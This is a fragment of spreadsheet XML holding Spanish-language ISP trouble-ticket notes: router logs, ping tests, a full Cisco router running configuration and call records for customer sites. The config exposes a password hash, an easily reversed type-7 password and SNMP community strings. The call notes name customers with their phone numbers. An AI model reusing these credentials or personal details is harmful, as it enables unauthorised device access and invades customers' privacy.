*MAR 31 15:57:02.199 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 15:57:07.063 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*APR  5 15:35:19.926 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG                                                                                        ABITETHERNET0/0/1.3121 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*APR  5 16:07:27.601 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG
*MAY 16 15:35:13.926 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG                                                                                        ABITETHERNET0/0/1.3121 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 16 16:07:29.601 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG                                                                                        ABITETHERNET0/0/1.3121 FROM LOADING TO FULL, LOADING DONE
*MAY 16 22:03:36.092 GUA: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTI                                                                                        ONIP] [SOURCE: 192.168.182.41] [LOCALPORT: 23] AT 22:03:26 GUA MON MAY 16 2022
CC_CGDC_GT_INTERNET_CENTRAL_Z13#</t>
  </si>
  <si>
    <t>NO SE A REAINICIADO HACE VARIAS SEMANAS SE PROCEDE A VALIDAR CON EL CLIENTE YA  QUE POR LOS REGISTROS ENCONTRADOS EN EL CPE TUVO UNA INTERMITENCIA PORVOCADA POR UNA RECONVERGENCIA POR UN TIME DEAD.  EN  LA ADYACENCIA O UNION A ALA RED LO CUAL PROVOCO SU INTERMITENCIA TEMPORAL YA SOLVENTADA
 190.143.221.1 SE LLEGA CORRECTAMENTE A TRAVEZ DE INTERNET A LA IP  COLOCADA EN EL ROUTER ESO SIGNIFICA QUE TIENE SALIDA A INTERNET
SE PROCEDE A VALIDAR CON EL CLIENTE
HACIENDO PING A 190.143.221.1 CON 32 BYTES DE DATOS:
RESPUESTA DESDE 190.143.221.1: BYTES=32 TIEMPO=12MS TTL=249
RESPUESTA DESDE 190.143.221.1: BYTES=32 TIEMPO=13MS TTL=249
RESPUESTA DESDE 190.143.221.1: BYTES=32 TIEMPO=10MS TTL=249
RESPUESTA DESDE 190.143.221.1: BYTES=32 TIEMPO=9MS TTL=249
ESTADÍSTICAS DE PING PARA 190.143.221.1:
    PAQUETES: ENVIADOS = 4, RECIBIDOS = 4, PERDIDOS = 0
    (0% PERDIDOS),
TIEMPOS APROXIMADOS DE IDA Y VUELTA EN MILISEGUNDOS:
    MÍNIMO = 9MS, MÁXIMO = 13MS, MEDIA = 11MS
CC_CGDC_GT_INTERNET_CENTRAL_Z13#SHO VER
CISCO IOS XE SOFTWARE, VERSION 16.09.02
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (X86_64_LINUX_IOSD-UNIVERSALK9-M), VERSI                                                                                        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GDC_GT_INTERNET_CENTRAL_Z13 UPTIME IS 1 YEAR, 2 WEEKS, 3 DAYS, 21 HOURS, 12                                                                                         MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 1 YEAR, 2 WEEKS, 3 DAYS, 21 HOURS, 14 MINUT                                                                                        ES
SYSTEM RETURNED TO ROM BY RELOAD COMMAND
SYSTEM IMAGE FILE IS "BOOTFLASH:ISR4400-UNIVERSALK9.16.09.02.SPA.BIN"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ADVUCSUITEK9          NONE                  NONE           NONE
UCK9
CME-SRST
CUBE
TECHNOLOGY PACKAGE LICENSE INFORMATION:
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
APPXK9           NONE             NONE             NONE
UCK9             NONE             NONE             NONE
SECURITYK9       NONE             NONE             NONE
IPBASE           IPBASEK9         PERMANENT        IPBASEK9
THE CURRENT THROUGHPUT LEVEL IS 1000000 KBPS
SMART LICENSING STATUS: SMART LICENSING IS DISABLED
CISCO ISR4431/K9 (1RU) PROCESSOR WITH 1784726K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2333A04Y
2 VIRTUAL ETHERNET INTERFACES
8 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
6598655K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_CGDC_GT_INTERNET_CENTRAL_Z13# SHO LOGG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES,                                                                                         0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 436 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 436 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 440 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (4096 BYTES):
 INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 10:45:49.914 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 10:45:59.123 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*MAR 31 11:00:02.962 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 11:00:02.964 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETA                                                                                        CHED
*MAR 31 11:00:03.961 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 11:00:17.975 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
*MAR 31 11:00:18.975 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 11:00:28.562 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*MAR 31 11:03:00.975 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 11:03:00.978 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETA                                                                                        CHED
*MAR 31 11:03:01.975 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 11:03:03.988 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
*MAR 31 11:03:04.989 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 11:03:08.978 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 11:03:09.978 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 11:03:11.990 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
*MAR 31 11:03:12.991 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 11:03:22.683 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*MAR 31 11:03:42.986 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 11:03:42.989 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETA                                                                                        CHED
*MAR 31 11:03:43.986 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 11:26:49.094 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
*MAR 31 11:26:50.094 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 11:26:54.789 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*MAR 31 15:15:30.017 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 15:15:30.019 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETA                                                                                        CHED
*MAR 31 15:15:31.017 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 15:57:01.199 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
*MAR 31 15:57:02.199 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO UP
*MAR 31 15:57:07.063 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM LOADING TO FULL, LOADING DONE
*APR  5 15:35:19.926 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG                                                                                        ABITETHERNET0/0/1.3121 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*APR  5 16:07:27.601 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 192.168.198.93 ON GIG                                                                                        ABITETHERNET0/0/1.3121 FROM LOADING TO FULL, LOADING DONE
*MAY 16 22:03:26.092 GUA: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTI                                                                                        ONIP] [SOURCE: 192.168.182.41] [LOCALPORT: 23] AT 22:03:26 GUA MON MAY 16 2022
CC_CGDC_GT_INTERNET_CENTRAL_Z13#                        SHO INT DES
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN REDUNDANTE/_/67800002                                                                                        6T/_/
GI0/0/0.3597                   UP             UP       WAN PRINCIPAL/_/678000027                                                                                        T/_/
GI0/0/1                        UP             UP       WAN PRINCIPAL/_/678000027                                                                                        T/_/
GI0/0/1.3121                   UP             UP       WAN REDUNDANTE/_/67800002                                                                                        6T/_/
GI0/0/2                        ADMIN DOWN     DOWN
GI0/0/3                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP       "PUBLICAS IPV4"
GI0/1/1                        DOWN           DOWN     "PUBLICAS IPV4"
GI0/1/2                        DOWN           DOWN
GI0/1/3                        ADMIN DOWN     DOWN
GI0                            ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
LO502                          UP             UP       "GESTION_ROUTER"
VL1                            UP             DOWN
VL100                          UP             UP       LAN DEL CLIENTE
CONFIGURACION DE CPE
CC_CGDC_GT_INTERNET_CENTRAL_Z13#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 8153 BYTES
!
! LAST CONFIGURATION CHANGE AT 08:31:38 GUA FRI DEC 10 2021 BY GESTIONIP
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
PLATFORM HARDWARE THROUGHPUT LEVEL 1000000
!
HOSTNAME CC_CGDC_GT_INTERNET_CENTRAL_Z13
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
VRF DEFINITION MGMT-INTF
 !
 ADDRESS-FAMILY IPV4
 EXIT-ADDRESS-FAMILY
 !
 ADDRESS-FAMILY IPV6
 EXIT-ADDRESS-FAMILY
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 5 $1$XXI5$8.SFPOG53DLRNYMEYM6I00
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP VRF INFO_IPV4
!
IP NAME-SERVER 216.230.147.90 8.8.8.8
IP NAME-SERVER VRF INFO_IPV4 8.8.8.8 216.230.128.32
IP DOMAIN LOOKUP SOURCE-INTERFACE VLAN100
IP DOMAIN LOOKUP VRF INFO_IPV4 SOURCE-INTERFACE VLAN100
!
!
!
LOGIN BLOCK-FOR 120 ATTEMPTS 5 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-3123140407
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-3123140407
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-3123140407
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-3123140407
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 33313233 31343034 3037301E 170D3231 30333331 30373233
  34305A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D33 31323331
  34303430 37308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100C862 14B9B153 DA96ABAD 92CE1D45 970486B2 4C26E627 519ECAE1
  399DD9E2 8C1B3E7C 07C7D21C 1E81415F 393CC68D F39F9022 072A9D9D 5D2023A0
  9ED6E58F 8D9764B3 8FC044CD 0CB6543F 95B6C0AC 33FF8D5B 5F1FC4B4 2ACB7373
  346CE91F 4D8A1C36 D5BA161D 0B8B8F04 DEA884DD AC9D9F96 F5F8ED38 97173B26
  4D10D5B1 D4803571 98AAC8F3 C2864574 F8F2C5ED 6BC6C85B 0A09A925 28D01248
  F07F24B9 40FE5C0E 1E6EA691 FD0E8F30 D80517F5 CED7292A 53EEB32A A928A480
  19547EDD CCC7317B 08B1E46B 2C86B078 F8A363A2 5D702D04 06196938 3D632986
  2EE4788F 8873135B 387DCADD 3B511404 C51E7BA5 3687130E 03FF5465 8FBCBA2D
  BB235D68 78F10203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 147ACAEA E6C82EEB A5E45588 38504724 412A8B5F
  40301D06 03551D0E 04160414 7ACAEAE6 C82EEBA5 E4558838 50472441 2A8B5F40
  300D0609 2A864886 F70D0101 05050003 82010100 55C5D729 C30B4196 0F7EBB8C
  CAB12D10 7CDAF195 A942173B 823456BE FD381D70 B28F8796 E911DA1D 8EFFFB0A
  3C5240C8 F972C87E 190E3CAF D996BF1F B530BAB4 81051D42 3920215D 9E36D6A2
  C5562189 F1C3F9F5 11F897DA 1A721AD0 F8622B7A 0E218CE3 FA842851 308A41E9
  13C4E8F7 BB980090 F04353BE 9BF38BC7 14BA09B3 D3B4030C FC26B6DB E01BCE2C
  C171EB7A 4F8681B9 CACEF5F7 AC47BC1A 4136009F 2E80FEE9 F98FB247 17013A34
  A794F1EC C632E4CF B275D2E7 5C9D72B9 EEE60356 7916A0A0 6C582FBE 01D37A74
  24820359 F4E4D1CC E16F64F5 B9F57905 36C0613E A73223DF 85C2F7E3 A3E04642
  6EA48CED 0AA57B7D 634F1E95 619B73FB 75F81384
        QUIT
!
LICENSE UDI PID ISR4431/K9 SN FOC23277TMS
LICENSE ACCEPT END USER AGREEMENT
NO LICENSE SMART ENABLE
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
!
USERNAME GESTIONIP PASSWORD 7 11073C520042190740
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
VLAN 3121
 NAME REDUND_IPV4_INFO
!
VLAN 3597
 NAME PRINCI_IPV4_INFO
!
!
CLASS-MAP MATCH-ALL SERVICIOS_250MB
 MATCH ANY
!
POLICY-MAP 100MBPS
 CLASS CLASS-DEFAULT
  POLICE RATE 100000000  BURST 19200000  PEAK-BURST 38400000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
POLICY-MAP SERVICIOS_250MB
 CLASS SERVICIOS_250MB
  POLICE CIR 256000000 BC 48000000 BE 96000000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP VRF FORWARDING INFO_IPV4
 IP ADDRESS 10.212.182.147 255.255.255.255
!
INTERFACE LOOPBACK502
 DESCRIPTION "GESTION_ROUTER"
 IP VRF FORWARDING INFO_IPV4
 IP ADDRESS 10.13.154.153 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN REDUNDANTE/_/678000026T/_/
 BANDWIDTH 102400
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SPEED 1000
 NO NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/0.3597
 DESCRIPTION WAN PRINCIPAL/_/678000027T/_/
 BANDWIDTH 256000
 ENCAPSULATION DOT1Q 3597
 IP VRF FORWARDING INFO_IPV4
 IP ADDRESS 192.168.201.78 255.255.255.252
 IP OSPF MTU-IGNORE
 IP OSPF COST 50
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION WAN PRINCIPAL/_/678000027T/_/
 BANDWIDTH 256000
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SPEED 1000
 NO NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1.3121
 DESCRIPTION WAN REDUNDANTE/_/678000026T/_/
 BANDWIDTH 100000
 ENCAPSULATION DOT1Q 3121
 IP VRF FORWARDING INFO_IPV4
 IP ADDRESS 192.168.182.42 255.255.255.252
 IP OSPF MTU-IGNORE
 IP OSPF COST 200
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION "PUBLICAS IPV4"
 SWITCHPORT ACCESS VLAN 100
 LOAD-INTERVAL 30
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION "PUBLICAS IPV4"
 SWITCHPORT ACCESS VLAN 100
 LOAD-INTERVAL 30
!
INTERFACE GIGABITETHERNET0/1/2
 SWITCHPORT ACCESS VLAN 100
 LOAD-INTERVAL 30
!
INTERFACE GIGABITETHERNET0/1/3
 SWITCHPORT ACCESS VLAN 100
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0
 VRF FORWARDING MGMT-INTF
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE VLAN1
 NO IP ADDRESS
!
INTERFACE VLAN100
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 100000
 IP VRF FORWARDING INFO_IPV4
 IP ADDRESS 190.143.221.1 255.255.255.224
 NO AUTOSTATE
 SERVICE-POLICY INPUT SERVICIOS_250MB
 SERVICE-POLICY OUTPUT SERVICIOS_250MB
!
ROUTER OSPF 181 VRF INFO_IPV4
 ROUTER-ID 10.13.154.153
 REDISTRIBUTE CONNECTED SUBNETS
 NETWORK 10.13.154.153 0.0.0.0 AREA 0
 NETWORK 10.212.182.147 0.0.0.0 AREA 0
 NETWORK 192.168.182.40 0.0.0.3 AREA 0
 NETWORK 192.168.201.76 0.0.0.3 AREA 0
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP TFTP SOURCE-INTERFACE GIGABITETHERNET0
!
!
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 190.148.15.192 0.0.0.15 ANY
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
 PERMIT IP 192.168.182.40 0.0.0.3 ANY
 PERMIT IP 192.168.201.76 0.0.0.3 ANY
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 100 PERMIT TCP 66.119.95.0 0.0.0.255 ANY EQ TELNET
ACCESS-LIST 100 PERMIT TCP 192.168.0.0 0.0.255.255 ANY EQ TELNET
ACCESS-LIST 100 PERMIT TCP 10.10.0.0 0.0.255.255 ANY EQ TELNET
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY COYOTE_UGLY RO
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_CENTRAL - 7A. AVENIDA 7-32 ZONA 13
!
!
CONTROL-PLANE
!
BANNER LOGIN ^CC----------------------------------------------------------------                                                                                        ------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TRANSPORT OUTPUT ALL
 STOPBITS 1
LINE AUX 0
 ACCESS-CLASS ACCESO IN
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN VRF-ALSO
 LOGIN LOCAL
 TRANSPORT INPUT ALL
LINE VTY 5 15
 ACCESS-CLASS ACCESO IN VRF-ALSO
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_CGDC_GT_INTERNET_CENTRAL_Z13#</t>
  </si>
  <si>
    <t>EL SERVICIO SE ENCUENTRA OPERATIVO POR PARTE DE CLARO SE TIENE UN PATRON MARCADO QUE ES UNA PROTECION CONTRA ATAQUES DE LA RED DE XT SE PORCEDERA A VALIDAR SI SE TIENE GESTION DEL EQUIPO CPE PARA VALIDAR ALGUNA ALARMA EN EL CLIENTE
UNICENTRO#PIN   192.168.182.42 RE 1000 SI 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 1000-BYTE ICMP ECHOS TO 192.168.182.42, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (993/1000), ROUND-TRIP MIN/AVG/MAX = 1/1/20 MS
UNICENTRO#SH INTERFACES  DESCRIPTION | I 3121
PO7.3121                       UP             UP       CONTRALORIA GENERAL DE CUENTAS CGC1 CENTRAL REDUNDANTE 7-32 Z13 INFO 100MB C-0201900335
UNICENTRO#</t>
  </si>
  <si>
    <t>F4565657</t>
  </si>
  <si>
    <t>** ROBERTO CARLOS MOSCOSO  / JESENIA DE MOSCOSO  /  SILVINA N50198179/ 50198062 (CLIENTE) NO RESPONDEN -*
-*</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE  A SILVINA CHAVEZ AL 23625191 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001829355
**</t>
  </si>
  <si>
    <t>SE LLAMA A TÉCNICO DANIEL MONTENEGRO QUIEN INDICA QUE YA SE ENCUENTRA EN SITIO DE CLIENTE PERO NO LES BRINDAN EL INGRESO, SE INTENTA CONTACTAR A CLIENTEL SILVINA M,AS SIN EMBARGO NO SE TIENE RESPUESTA
2001875759
COLA:
NOMBRE: A: 54633118
NÚMERO: 54633118
DURACIÓN: 0:00:39
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 54633118
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 17/05/2022 10:33:28</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROBERTO CARLOS MOSCOSO AL 50198179 CONTESTA LA SEÑORA JESENIA DE MOSCOSO  QUIEN SOLICITA QUE SE LE LLAME A SILVINA CHAVEZ AL 23625191**
ID 2001828385
**</t>
  </si>
  <si>
    <t>F4565658</t>
  </si>
  <si>
    <t>F4565699</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR JEFERZON ARCE CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
ID 2001838907
**</t>
  </si>
  <si>
    <t>F4565700</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PROECEDE A DEJAR EN ETAPA PENDIENTE CLIENTE .
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN BANRURAL 10.72.124.19
  PING 10.72.124.19: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.124.19 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.37
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.124.19
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
